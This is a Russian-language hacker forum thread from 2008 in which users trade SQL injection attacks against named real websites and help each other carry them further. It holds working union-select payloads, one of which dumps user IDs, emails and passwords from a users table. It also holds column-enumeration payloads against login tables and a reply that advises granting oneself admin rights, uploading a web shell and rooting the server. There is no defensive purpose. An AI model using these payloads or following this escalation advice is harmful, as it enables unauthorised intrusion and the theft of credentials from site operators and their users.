03.12.2008, 22:40
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
0nep@t0p, я бы так не утверждал .. 2 поля и причём вывод есть 
http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+version(),1/*
4.1.22
на брут не ставил.. ибо мне это не к чему ..
|
|
|
03.12.2008, 22:43
|
|
Новичок
Регистрация: 25.10.2006
Сообщений: 10
С нами:
10285880
Репутация:
1
|
|
тоесть в принципе можно поковырять до конца?  может у кого еще какие варианты,? |
|
|
|
03.12.2008, 23:34
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Докопался до mysql сервера, благодаря чему есть возможно "дарить" максимальные права для определенных пользователей.
Mysql привязан к директадминЧеку....
Сам вопрос: можно ли при определенных махинациях с Mysql(не брут рутовых паролей) и "дарением" прав конкретным пользователям - получить неограниченный доступ хождения по папкам и файлам.
В то числе и рутовским.
такое можно сотворить?
|
|
|
|
03.12.2008, 23:52
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
Сообщение от Ershik
Докопался до mysql сервера, благодаря чему есть возможно "дарить" максимальные права для определенных пользователей.
Mysql привязан к директадминЧеку....
Сам вопрос: можно ли при определенных махинациях с Mysql(не брут рутовых паролей) и "дарением" прав конкретным пользователям - получить неограниченный доступ хождения по папкам и файлам.
В то числе и рутовским.
такое можно сотворить?
Ну так для начала подари себе права админа, зайди в админку, через нее залей шелл, порутай систему и сможешь просматривать, под правами root все папки и файлы =)
PS Иначе никак, на то они и рутовские
|
|
|
|
04.12.2008, 12:52
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Код:
http://db.zenyro.ru/items/use.html'
Возможна ли инъекция? |
|
|
|
03.12.2008, 23:36
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
Товарищи, будте внимательнее =)
Код:
http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+concat_ws(char(58),user_id,name,email,password,title,access),1+from+NEX_USERS+limit+0,1/*
|
|
|
|
04.12.2008, 13:07
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
DimOnOID
да это иьект твоя задача закоментировать не нужные данные запроса и подобрать количество колонок..
http://db.zenyro.ru/items/use.html'+union+select+1,2,3,4,5,6,7,8,9,10--+
Последний раз редактировалось sabe; 04.12.2008 в 13:17..
|
|
|
|
04.12.2008, 13:40
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от sabe
DimOnOID
да это иьект твоя задача закоментировать не нужные данные запроса и подобрать количество колонок..
http://db.zenyro.ru/items/use.html'order+by+2--+
1 колонка..вывода нету..как слепую заюзать не удаётца
|
|
|
|
04.12.2008, 17:33
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
Проблема с:
Код HTML:
http://www.mcmusic.ie/index.asp?secID=1'&part=1
Помогите раскрутить. Очень нужно |
|
|
|
04.12.2008, 17:58
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами:
10660753
Репутация:
676
|
|
~EviL~
ms access, колонок 5, к системным таблицам доступа нет => узнавать имена таблиц\колонок только перебором...
http://www.mcmusic.ie/index.asp?secID=-1+union+select+1,2,3,4,5+from+tbl_logins
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
